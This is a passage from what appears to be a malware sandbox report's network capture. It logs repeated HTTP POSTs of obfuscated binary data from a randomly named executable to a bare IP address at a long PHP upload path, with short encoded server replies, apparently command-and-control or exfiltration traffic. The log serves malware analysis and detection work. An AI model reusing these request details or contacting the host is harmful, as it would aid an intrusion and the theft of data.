                                                                                                                      Dec 8, 2024 15:28:01.482070923 CET2584OUTData Raw: 50 5a 43 5c 5b 46 55 55 54 5e 50 59 5b 5f 59 5c 59 5d 59 58 57 5c 51 59 59 58 5a 5e 51 5b 55 5c 5d 5d 56 54 59 5c 52 5d 5c 5d 59 56 50 5e 5f 5a 50 5c 5b 58 58 5e 50 59 56 5a 5e 5b 58 59 5a 43 5a 52 41 46 59 5c 55 54 46 5f 5c 59 58 5a 5d 5f 5b 5c
                                                                                                                      Data Ascii: PZC\[FUUT^PY[_Y\Y]YXW\QYYXZ^Q[U\]]VTY\R]\]YVP^_ZP\[XX^PYVZ^[XYZCZRAFY\UTF_\YXZ]_[\WSSDQZ^PUW[VSPYT\VZV]V[V\SYUX\]D]PZ^ZSS_^\ST[Y^WY[P]^ZCR]TY]ZWP]RY]XPYYYB_T_PP]P^[]Z^Q\^QU^UZ_]\XQ\P^Y.3=X19)]! 6,7*]"8*[;($$[%3*%>^4\.+ ]!![
                                                                                                                      Dec 8, 2024 15:28:02.461975098 CET25INHTTP/1.1 100 Continue
                                                                                                                      Dec 8, 2024 15:28:02.700519085 CET207INHTTP/1.1 200 OK
                                                                                                                      Date: Sun, 08 Dec 2024 14:28:02 GMT
                                                                                                                      Server: Apache/2.4.41 (Ubuntu)
                                                                                                                      Content-Length: 4
                                                                                                                      Keep-Alive: timeout=5, max=100
                                                                                                                      Connection: Keep-Alive
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Data Raw: 34 5b 40 58
                                                                                                                      Data Ascii: 4[@X


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      30192.168.2.449790185.246.67.73808028C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      Dec 8, 2024 15:28:02.940985918 CET562OUTPOST /Uploads/server9/universalUploads/Trafficcentraldatalife/phplow3/trackMultiupdatePacket/Javascript3lowpython/db/ProtonBigloadApiline/5flowertrackJs/VoiddbProtect/1Temptraffic/TrackDatalife0/auth/JsToProton/uploads6centralLinux/Providerto_packetLowServerbaseDownloads.php HTTP/1.1
                                                                                                                      Content-Type: application/octet-stream
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                                                                                      Host: 185.246.67.73
                                                                                                                      Content-Length: 2584
                                                                                                                      Expect: 100-continue
                                                                                                                      Connection: Keep-Alive
                                                                                                                      Dec 8, 2024 15:28:03.294548988 CET2584OUTData Raw: 55 5c 43 51 5e 45 50 52 54 5e 50 59 5b 5e 59 5f 59 58 59 57 57 51 51 58 59 58 5a 5e 51 5b 55 5c 5d 5d 56 54 59 5c 52 5d 5c 5d 59 56 50 5e 5f 5a 50 5c 5b 58 58 5e 50 59 56 5a 5e 5b 58 59 5a 43 5a 52 41 46 59 5c 55 54 46 5f 5c 59 58 5a 5d 5f 5b 5c
                                                                                                                      Data Ascii: U\CQ^EPRT^PY[^Y_YXYWWQQXYXZ^Q[U\]]VTY\R]\]YVP^_ZP\[XX^PYVZ^[XYZCZRAFY\UTF_\YXZ]_[\WSSDQZ^PUW[VSPYT\VZV]V[V\SYUX\]D]PZ^ZSS_^\ST[Y^WY[P]^ZCR]TY]ZWP]RY]XPYYYB_T_PP]P^[]Z^Q\^QU^UZ_]\XQ\P^Y.$=$*)6 69.X7;),;;'1V*\';&"<].+ ]!![ 8


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      31192.168.2.449791185.246.67.73808028C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      Dec 8, 2024 15:28:04.077606916 CET562OUTPOST /Uploads/server9/universalUploads/Trafficcentraldatalife/phplow3/trackMultiupdatePacket/Javascript3lowpython/db/ProtonBigloadApiline/5flowertrackJs/VoiddbProtect/1Temptraffic/TrackDatalife0/auth/JsToProton/uploads6centralLinux/Providerto_packetLowServerbaseDownloads.php HTTP/1.1
                                                                                                                      Content-Type: application/octet-stream
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                                                                                      Host: 185.246.67.73
                                                                                                                      Content-Length: 1864
                                                                                                                      Expect: 100-continue
                                                                                                                      Connection: Keep-Alive
                                                                                                                      Dec 8, 2024 15:28:04.435139894 CET1864OUTData Raw: 50 52 43 51 5e 45 50 54 54 5e 50 59 5b 58 59 53 59 5a 59 5e 57 51 51 5a 59 58 5a 5e 51 5b 55 5c 5d 5d 56 54 59 5c 52 5d 5c 5d 59 56 50 5e 5f 5a 50 5c 5b 58 58 5e 50 59 56 5a 5e 5b 58 59 5a 43 5a 52 41 46 59 5c 55 54 46 5f 5c 59 58 5a 5d 5f 5b 5c
                                                                                                                      Data Ascii: PRCQ^EPTT^PY[XYSYZY^WQQZYXZ^Q[U\]]VTY\R]\]YVP^_ZP\[XX^PYVZ^[XYZCZRAFY\UTF_\YXZ]_[\WSSDQZ^PUW[VSPYT\VZV]V[V\SYUX\]D]PZ^ZSS_^\ST[Y^WY[P]^ZCR]TY]ZWP]RY]XPYYYB_T_PP]P^[]Z^Q\^QU^UZ_]\XQ\P^Y._'>!X%!X#0::"785/8?0-,% -&;*X#Z?[.+ ]!![
                                                                                                                      Dec 8, 2024 15:28:05.398590088 CET25INHTTP/1.1 100 Continue
                                                                                                                      Dec 8, 2024 15:28:05.636485100 CET380INHTTP/1.1 200 OK
                                                                                                                      Date: Sun, 08 Dec 2024 14:28:05 GMT
                                                                                                                      Server: Apache/2.4.41 (Ubuntu)
                                                                                                                      Vary: Accept-Encoding
                                                                                                                      Content-Length: 152
                                                                                                                      Keep-Alive: timeout=5, max=100
                                                                                                                      Connection: Keep-Alive
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Data Raw: 06 13 39 50 31 1b 0d 10 2a 14 07 04 32 2c 38 02 33 01 2f 15 3d 56 37 5b 25 39 30 5f 3b 04 0d 1c 23 2c 30 14 27 04 2c 1e 22 2f 23 15 2d 28 20 5a 06 10 22 03 25 11 2c 05 28 28 25 14 26 06 39 0a 35 34 28 1d 33 13 01 53 3e 03 26 5e 37 06 3c 0a 32 3e 2a 0a 2e 26 22 5c 31 30 05 1e 27 36 2c 55 0f 1f 25 0b 24 32 27 1f 37 27 36 57 21 0e 23 5d 26 0b 26 15 22 2c 3c 1b 28 2d 2b 02 28 1c 05 01 23 31 3f 1d 2d 15 2e 01 29 1c 2c 0c 30 2c 20 53 2a 02 2e 54 0d 33 56 52
                                                                                                                      Data Ascii: 9P1*2,83/=V7[%90_;#,0',"/#-( Z"%,((%&954(3S>&^7<2>*.&"\10'6,U%$2'7'6W!#]&&",<(-+(#1?-.),0, S*.T3VR


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      32192.168.2.449792185.246.67.73808028C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      Dec 8, 2024 15:28:04.385284901 CET562OUTPOST /Uploads/server9/universalUploads/Trafficcentraldatalife/phplow3/trackMultiupdatePacket/Javascript3lowpython/db/ProtonBigloadApiline/5flowertrackJs/VoiddbProtect/1Temptraffic/TrackDatalife0/auth/JsToProton/uploads6centralLinux/Providerto_packetLowServerbaseDownloads.php HTTP/1.1
                                                                                                                      Content-Type: application/octet-stream
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                                                                                      Host: 185.246.67.73
                                                                                                                      Content-Length: 2584
                                                                                                                      Expect: 100-continue
                                                                                                                      Connection: Keep-Alive
                                                                                                                      Dec 8, 2024 15:28:04.732068062 CET2584OUTData Raw: 50 5e 46 57 5b 46 55 50 54 5e 50 59 5b 5a 59 5e 59 59 59 5a 57 55 51 5c 59 58 5a 5e 51 5b 55 5c 5d 5d 56 54 59 5c 52 5d 5c 5d 59 56 50 5e 5f 5a 50 5c 5b 58 58 5e 50 59 56 5a 5e 5b 58 59 5a 43 5a 52 41 46 59 5c 55 54 46 5f 5c 59 58 5a 5d 5f 5b 5c
                                                                                                                      Data Ascii: P^FW[FUPT^PY[ZY^YYYZWUQ\YXZ^Q[U\]]VTY\R]\]YVP^_ZP\[XX^PYVZ^[XYZCZRAFY\UTF_\YXZ]_[\WSSDQZ^PUW[VSPYT\VZV]V[V\SYUX\]D]PZ^ZSS_^\ST[Y^WY[P]^ZCR]TY]ZWP]RY]XPYYYB_T_PP]P^[]Z^Q\^QU^UZ_]\XQ\P^Y-'!196#5].&7(:^/,W$X#%V>%+!",;/ ]!![ (
                                                                                                                      Dec 8, 2024 15:28:05.749109983 CET25INHTTP/1.1 100 Continue
                                                                                                                      Dec 8, 2024 15:28:05.984385014 CET207INHTTP/1.1 200 OK
                                                                                                                      Date: Sun, 08 Dec 2024 14:28:05 GMT
                                                                                                                      Server: Apache/2.4.41 (Ubuntu)
                                                                                                                      Content-Length: 4
                                                                                                                      Keep-Alive: timeout=5, max=100
                                                                                                                      Connection: Keep-Alive
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Data Raw: 34 5b 40 58
                                                                                                                      Data Ascii: 4[@X


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      33192.168.2.449798185.246.67.73808028C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      Dec 8, 2024 15:28:06.221746922 CET538OUTPOST /Uploads/server9/universalUploads/Trafficcentraldatalife/phplow3/trackMultiupdatePacket/Javascript3lowpython/db/ProtonBigloadApiline/5flowertrackJs/VoiddbProtect/1Temptraffic/TrackDatalife0/auth/JsToProton/uploads6centralLinux/Providerto_packetLowServerbaseDownloads.php HTTP/1.1
                                                                                                                      Content-Type: application/octet-stream
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                                                                                      Host: 185.246.67.73
                                                                                                                      Content-Length: 2584
                                                                                                                      Expect: 100-continue
                                                                                                                      Dec 8, 2024 15:28:06.575860977 CET2584OUTData Raw: 50 5f 43 53 5e 44 50 53 54 5e 50 59 5b 5e 59 59 59 55 59 58 57 55 51 56 59 58 5a 5e 51 5b 55 5c 5d 5d 56 54 59 5c 52 5d 5c 5d 59 56 50 5e 5f 5a 50 5c 5b 58 58 5e 50 59 56 5a 5e 5b 58 59 5a 43 5a 52 41 46 59 5c 55 54 46 5f 5c 59 58 5a 5d 5f 5b 5c
                                                                                                                      Data Ascii: P_CS^DPST^PY[^YYYUYXWUQVYXZ^Q[U\]]VTY\R]\]YVP^_ZP\[XX^PYVZ^[XYZCZRAFY\UTF_\YXZ]_[\WSSDQZ^PUW[VSPYT\VZV]V[V\SYUX\]D]PZ^ZSS_^\ST[Y^WY[P]^ZCR]TY]ZWP]RY]XPYYYB_T_PP]P^[]Z^Q\^QU^UZ_]\XQ\P^Y.Z0-$*5Z"#5]:$48/(3$= '36&+7<, ]!![ 8
                                                                                                                      Dec 8, 2024 15:28:07.590177059 CET25INHTTP/1.1 100 Continue
                                                                                                                      Dec 8, 2024 15:28:07.824384928 CET151INHTTP/1.1 200 OK
                                                                                                                      Date: Sun, 08 Dec 2024 14:28:07 GMT
                                                                                                                      Server: Apache/2.4.41 (Ubuntu)
                                                                                                                      Content-Length: 4
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Data Raw: 34 5b 40 58
                                                                                                                      Data Ascii: 4[@X


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      34192.168.2.449804185.246.67.73808028C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      Dec 8, 2024 15:28:08.074579000 CET562OUTPOST /Uploads/server9/universalUploads/Trafficcentraldatalife/phplow3/trackMultiupdatePacket/Javascript3lowpython/db/ProtonBigloadApiline/5flowertrackJs/VoiddbProtect/1Temptraffic/TrackDatalife0/auth/JsToProton/uploads6centralLinux/Providerto_packetLowServerbaseDownloads.php HTTP/1.1
                                                                                                                      Content-Type: application/octet-stream
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                                                                                      Host: 185.246.67.73
                                                                                                                      Content-Length: 2584
                                                                                                                      Expect: 100-continue
                                                                                                                      Connection: Keep-Alive
                                                                                                                      Dec 8, 2024 15:28:08.419606924 CET2584OUTData Raw: 50 52 46 57 5e 42 55 56 54 5e 50 59 5b 5a 59 5b 59 58 59 57 57 51 51 57 59 58 5a 5e 51 5b 55 5c 5d 5d 56 54 59 5c 52 5d 5c 5d 59 56 50 5e 5f 5a 50 5c 5b 58 58 5e 50 59 56 5a 5e 5b 58 59 5a 43 5a 52 41 46 59 5c 55 54 46 5f 5c 59 58 5a 5d 5f 5b 5c
                                                                                                                      Data Ascii: PRFW^BUVT^PY[ZY[YXYWWQQWYXZ^Q[U\]]VTY\R]\]YVP^_ZP\[XX^PYVZ^[XYZCZRAFY\UTF_\YXZ]_[\WSSDQZ^PUW[VSPYT\VZV]V[V\SYUX\]D]PZ^ZSS_^\ST[Y^WY[P]^ZCR]TY]ZWP]RY]XPYYYB_T_PP]P^[]Z^Q\^QU^UZ_]\XQ\P^Y.X%-%*5]":942X78%88<R$>^%)&;.]7?#\/; ]!![ (
                                                                                                                      Dec 8, 2024 15:28:09.395766020 CET25INHTTP/1.1 100 Continue
                                                                                                                      Dec 8, 2024 15:28:09.632359982 CET207INHTTP/1.1 200 OK
                                                                                                                      Date: Sun, 08 Dec 2024 14:28:09 GMT
                                                                                                                      Server: Apache/2.4.41 (Ubuntu)
                                                                                                                      Content-Length: 4
                                                                                                                      Keep-Alive: timeout=5, max=100
                                                                                                                      Connection: Keep-Alive
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Data Raw: 34 5b 40 58
                                                                                                                      Data Ascii: 4[@X


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      35192.168.2.449810185.246.67.73808028C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      Dec 8, 2024 15:28:09.878664017 CET562OUTPOST /Uploads/server9/universalUploads/Trafficcentraldatalife/phplow3/trackMultiupdatePacket/Javascript3lowpython/db/ProtonBigloadApiline/5flowertrackJs/VoiddbProtect/1Temptraffic/TrackDatalife0/auth/JsToProton/uploads6centralLinux/Providerto_packetLowServerbaseDownloads.php HTTP/1.1
                                                                                                                      Content-Type: application/octet-stream
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                                                                                      Host: 185.246.67.73
                                                                                                                      Content-Length: 2584
                                                                                                                      Expect: 100-continue
                                                                                                                      Connection: Keep-Alive
                                                                                                                      Dec 8, 2024 15:28:10.232054949 CET2584OUTData Raw: 50 5d 46 57 5e 44 55 52 54 5e 50 59 5b 50 59 5b 59 59 59 5c 57 5c 51 5f 59 58 5a 5e 51 5b 55 5c 5d 5d 56 54 59 5c 52 5d 5c 5d 59 56 50 5e 5f 5a 50 5c 5b 58 58 5e 50 59 56 5a 5e 5b 58 59 5a 43 5a 52 41 46 59 5c 55 54 46 5f 5c 59 58 5a 5d 5f 5b 5c
                                                                                                                      Data Ascii: P]FW^DURT^PY[PY[YYY\W\Q_YXZ^Q[U\]]VTY\R]\]YVP^_ZP\[XX^PYVZ^[XYZCZRAFY\UTF_\YXZ]_[\WSSDQZ^PUW[VSPYT\VZV]V[V\SYUX\]D]PZ^ZSS_^\ST[Y^WY[P]^ZCR]TY]ZWP]RY]XPYYYB_T_PP]P^[]Z^Q\^QU^UZ_]\XQ\P^Y.0-.&9!9X94&^ ,$V0.$_%!28%"?+/; ]!![


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      36192.168.2.449811185.246.67.73808028C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      Dec 8, 2024 15:28:10.758836985 CET562OUTPOST /Uploads/server9/universalUploads/Trafficcentraldatalife/phplow3/trackMultiupdatePacket/Javascript3lowpython/db/ProtonBigloadApiline/5flowertrackJs/VoiddbProtect/1Temptraffic/TrackDatalife0/auth/JsToProton/uploads6centralLinux/Providerto_packetLowServerbaseDownloads.php HTTP/1.1
                                                                                                                      Content-Type: application/octet-stream
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                                                                                      Host: 185.246.67.73
                                                                                                                      Content-Length: 1904
                                                                                                                      Expect: 100-continue
                                                                                                                      Connection: Keep-Alive
                                                                                                                      Dec 8, 2024 15:28:11.107023001 CET1904OUTData Raw: 55 5c 43 55 5e 43 55 53 54 5e 50 59 5b 5f 59 59 59 59 59 5f 57 50 51 57 59 58 5a 5e 51 5b 55 5c 5d 5d 56 54 59 5c 52 5d 5c 5d 59 56 50 5e 5f 5a 50 5c 5b 58 58 5e 50 59 56 5a 5e 5b 58 59 5a 43 5a 52 41 46 59 5c 55 54 46 5f 5c 59 58 5a 5d 5f 5b 5c
                                                                                                                      Data Ascii: U\CU^CUST^PY[_YYYYY_WPQWYXZ^Q[U\]]VTY\R]\]YVP^_ZP\[XX^PYVZ^[XYZCZRAFY\UTF_\YXZ]_[\WSSDQZ^PUW[VSPYT\VZV]V[V\SYUX\]D]PZ^ZSS_^\ST[Y^WY[P]^ZCR]TY]ZWP]RY]XPYYYB_T_PP]P^[]Z^Q\^QU^UZ_]\XQ\P^Y-3*%*&5::-4:X/'0Z%01'89#/+ ]!![
                                                                                                                      Dec 8, 2024 15:28:12.098699093 CET25INHTTP/1.1 100 Continue
                                                                                                                      Dec 8, 2024 15:28:12.332377911 CET380INHTTP/1.1 200 OK
                                                                                                                      Date: Sun, 08 Dec 2024 14:28:11 GMT
                                                                                                                      Server: Apache/2.4.41 (Ubuntu)
                                                                                                                      Vary: Accept-Encoding
                                                                                                                      Content-Length: 152
                                                                                                                      Keep-Alive: timeout=5, max=100
                                                                                                                      Connection: Keep-Alive
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Data Raw: 06 13 3a 09 25 36 37 1d 2a 04 29 02 25 2c 3c 07 30 2b 3c 06 2a 56 27 5c 27 5f 2c 5b 38 39 23 1e 20 02 2b 00 27 03 0d 01 22 02 3c 08 2d 38 20 5a 06 10 21 14 25 11 30 03 28 05 31 5d 24 28 2e 1c 22 09 3f 41 27 04 2b 53 3e 3a 2e 5e 34 2f 05 56 31 13 32 0c 2e 1b 0c 5d 26 30 0d 1c 25 0c 2c 55 0f 1f 25 09 27 32 06 0f 23 27 2a 1d 21 30 09 19 26 0b 2a 50 35 01 2b 0f 3f 3d 24 5e 28 22 05 03 22 22 33 13 2e 28 26 01 2a 0b 23 56 27 16 20 53 2a 02 2e 54 0d 33 56 52
                                                                                                                      Data Ascii: :%67*)%,<0+<*V'\'_,[89# +'"<-8 Z!%0(1]$(."?A'+S>:.^4/V12.]&0%,U%'2#'*!0&*P5+?=$^("""3.(&*#V' S*.T3VR


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      37192.168.2.449812185.246.67.73808028C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      Dec 8, 2024 15:28:10.880629063 CET562OUTPOST /Uploads/server9/universalUploads/Trafficcentraldatalife/phplow3/trackMultiupdatePacket/Javascript3lowpython/db/ProtonBigloadApiline/5flowertrackJs/VoiddbProtect/1Temptraffic/TrackDatalife0/auth/JsToProton/uploads6centralLinux/Providerto_packetLowServerbaseDownloads.php HTTP/1.1
                                                                                                                      Content-Type: application/octet-stream
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                                                                                      Host: 185.246.67.73
                                                                                                                      Content-Length: 2584
                                                                                                                      Expect: 100-continue
                                                                                                                      Connection: Keep-Alive
                                                                                                                      Dec 8, 2024 15:28:11.232026100 CET2584OUTData Raw: 50 53 43 5d 5b 49 55 50 54 5e 50 59 5b 50 59 5e 59 58 59 5b 57 5c 51 5a 59 58 5a 5e 51 5b 55 5c 5d 5d 56 54 59 5c 52 5d 5c 5d 59 56 50 5e 5f 5a 50 5c 5b 58 58 5e 50 59 56 5a 5e 5b 58 59 5a 43 5a 52 41 46 59 5c 55 54 46 5f 5c 59 58 5a 5d 5f 5b 5c
                                                                                                                      Data Ascii: PSC][IUPT^PY[PY^YXY[W\QZYXZ^Q[U\]]VTY\R]\]YVP^_ZP\[XX^PYVZ^[XYZCZRAFY\UTF_\YXZ]_[\WSSDQZ^PUW[VSPYT\VZV]V[V\SYUX\]D]PZ^ZSS_^\ST[Y^WY[P]^ZCR]TY]ZWP]RY]XPYYYB_T_PP]P^[]Z^Q\^QU^UZ_]\XQ\P^Y._'[*%_56#Y.9"(^,+$/2 .1& Z;[.; ]!![
                                                                                                                      Dec 8, 2024 15:28:12.200032949 CET25INHTTP/1.1 100 Continue
                                                                                                                      Dec 8, 2024 15:28:12.432145119 CET207INHTTP/1.1 200 OK
                                                                                                                      Date: Sun, 08 Dec 2024 14:28:11 GMT
                                                                                                                      Server: Apache/2.4.41 (Ubuntu)
                                                                                                                      Content-Length: 4
                                                                                                                      Keep-Alive: timeout=5, max=100
                                                                                                                      Connection: Keep-Alive
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Data Raw: 34 5b 40 58
                                                                                                                      Data Ascii: 4[@X


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      38192.168.2.449818185.246.67.73808028C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      Dec 8, 2024 15:28:12.675534964 CET538OUTPOST /Uploads/server9/universalUploads/Trafficcentraldatalife/phplow3/trackMultiupdatePacket/Javascript3lowpython/db/ProtonBigloadApiline/5flowertrackJs/VoiddbProtect/1Temptraffic/TrackDatalife0/auth/JsToProton/uploads6centralLinux/Providerto_packetLowServerbaseDownloads.php HTTP/1.1
                                                                                                                      Content-Type: application/octet-stream
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                                                                                      Host: 185.246.67.73
                                                                                                                      Content-Length: 2584
                                                                                                                      Expect: 100-continue
                                                                                                                      Dec 8, 2024 15:28:13.028896093 CET2584OUTData Raw: 55 5b 43 5c 5e 43 50 55 54 5e 50 59 5b 5b 59 5b 59 5a 59 58 57 55 51 5e 59 58 5a 5e 51 5b 55 5c 5d 5d 56 54 59 5c 52 5d 5c 5d 59 56 50 5e 5f 5a 50 5c 5b 58 58 5e 50 59 56 5a 5e 5b 58 59 5a 43 5a 52 41 46 59 5c 55 54 46 5f 5c 59 58 5a 5d 5f 5b 5c
                                                                                                                      Data Ascii: U[C\^CPUT^PY[[Y[YZYXWUQ^YXZ^Q[U\]]VTY\R]\]YVP^_ZP\[XX^PYVZ^[XYZCZRAFY\UTF_\YXZ]_[\WSSDQZ^PUW[VSPYT\VZV]V[V\SYUX\]D]PZ^ZSS_^\ST[Y^WY[P]^ZCR]TY]ZWP]RY]XPYYYB_T_PP]P^[]Z^Q\^QU^UZ_]\XQ\P^Y.%-&2:9X"#:2Y7;*^.;$$.+135';2]"<#.+ ]!![ ,
                                                                                                                      Dec 8, 2024 15:28:14.013664007 CET25INHTTP/1.1 100 Continue
                                                                                                                      Dec 8, 2024 15:28:14.248296022 CET151INHTTP/1.1 200 OK
                                                                                                                      Date: Sun, 08 Dec 2024 14:28:13 GMT
                                                                                                                      Server: Apache/2.4.41 (Ubuntu)
                                                                                                                      Content-Length: 4
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Data Raw: 34 5b 40 58
                                                                                                                      Data Ascii: 4[@X


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      39192.168.2.449824185.246.67.73808028C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      Dec 8, 2024 15:28:14.490434885 CET562OUTPOST /Uploads/server9/universalUploads/Trafficcentraldatalife/phplow3/trackMultiupdatePacket/Javascript3lowpython/db/ProtonBigloadApiline/5flowertrackJs/VoiddbProtect/1Temptraffic/TrackDatalife0/auth/JsToProton/uploads6centralLinux/Providerto_packetLowServerbaseDownloads.php HTTP/1.1
                                                                                                                      Content-Type: application/octet-stream
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                                                                                      Host: 185.246.67.73
                                                                                                                      Content-Length: 2584
                                                                                                                      Expect: 100-continue
                                                                                                                      Connection: Keep-Alive
                                                                                                                      Dec 8, 2024 15:28:14.842083931 CET2584OUTData Raw: 55 59 46 56 5b 43 50 56 54 5e 50 59 5b 59 59 58 59 59 59 5b 57 56 51 5c 59 58 5a 5e 51 5b 55 5c 5d 5d 56 54 59 5c 52 5d 5c 5d 59 56 50 5e 5f 5a 50 5c 5b 58 58 5e 50 59 56 5a 5e 5b 58 59 5a 43 5a 52 41 46 59 5c 55 54 46 5f 5c 59 58 5a 5d 5f 5b 5c
                                                                                                                      Data Ascii: UYFV[CPVT^PY[YYXYYY[WVQ\YXZ^Q[U\]]VTY\R]\]YVP^_ZP\[XX^PYVZ^[XYZCZRAFY\UTF_\YXZ]_[\WSSDQZ^PUW[VSPYT\VZV]V[V\SYUX\]D]PZ^ZSS_^\ST[Y^WY[P]^ZCR]TY]ZWP]RY]XPYYYB_T_PP]P^[]Z^Q\^QU^UZ_]\XQ\P^Y.[$=!Z2959]-$\";"X/8'>+&#)&+%7/</; ]!![ $
                                                                                                                      Dec 8, 2024 15:28:15.827668905 CET25INHTTP/1.1 100 Continue
                                                                                                                      Dec 8, 2024 15:28:16.060230970 CET207INHTTP/1.1 200 OK
                                                                                                                      Date: Sun, 08 Dec 2024 14:28:15 GMT
                                                                                                                      Server: Apache/2.4.41 (Ubuntu)
                                                                                                                      Content-Length: 4
                                                                                                                      Keep-Alive: timeout=5, max=100
                                                                                                                      Connection: Keep-Alive
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Data Raw: 34 5b 40 58
                                                                                                                      Data Ascii: 4[@X


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      40192.168.2.449830185.246.67.73808028C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      Dec 8, 2024 15:28:16.299949884 CET562OUTPOST /Uploads/server9/universalUploads/Trafficcentraldatalife/phplow3/trackMultiupdatePacket/Javascript3lowpython/db/ProtonBigloadApiline/5flowertrackJs/VoiddbProtect/1Temptraffic/TrackDatalife0/auth/JsToProton/uploads6centralLinux/Providerto_packetLowServerbaseDownloads.php HTTP/1.1
                                                                                                                      Content-Type: application/octet-stream
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                                                                                      Host: 185.246.67.73
                                                                                                                      Content-Length: 2584
                                                                                                                      Expect: 100-continue
                                                                                                                      Connection: Keep-Alive
                                                                                                                      Dec 8, 2024 15:28:16.654006958 CET2584OUTData Raw: 50 5a 43 51 5b 43 55 55 54 5e 50 59 5b 5a 59 5c 59 58 59 56 57 53 51 56 59 58 5a 5e 51 5b 55 5c 5d 5d 56 54 59 5c 52 5d 5c 5d 59 56 50 5e 5f 5a 50 5c 5b 58 58 5e 50 59 56 5a 5e 5b 58 59 5a 43 5a 52 41 46 59 5c 55 54 46 5f 5c 59 58 5a 5d 5f 5b 5c
